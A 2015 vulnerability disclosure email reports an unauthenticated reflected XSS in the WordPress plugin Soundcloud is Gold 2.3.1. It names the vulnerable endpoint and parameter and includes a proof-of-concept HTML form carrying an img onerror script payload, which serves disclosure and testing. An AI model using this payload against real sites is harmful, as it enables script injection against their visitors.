Subject: Cross-Site Scripting (XSS) in Soundcloud is Gold 2.3.1
Date: Wed, 26 Aug 2015 14:33:34 +0200

Hello,

Plugin: Soundcloud is Gold 2.3.1 https://wordpress.org/plugins/soundcloud-is-gold/

1. Reflected Cross-Site Scripting (XSS) 

Unauthenticated users can inject html/js code. HTML5 player needs to be disable in plugin options to explot this vulnerability.

Method: POST
Url: http://localhost/wp-admin/admin-ajax.php?action=get_soundcloud_player
Vulnerable parameters: id

Example PHP callstack:
get_soundcloud_player   [/soundcloud-is-gold/soundcloud-is-gold-functions.php:683]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=get_soundcloud_player" />
<input type="text" name="id" value='"></param></object><img src=x onerror=alert(1) />' />
<input type="text" name="format" value="1">
<input type="submit" name="submit" />
</form>
--

Possible other XSS in get_soundcloud_is_gold_user_tracks() (params: post_id, selectFormat)

--
Regards,
Marcin Probola,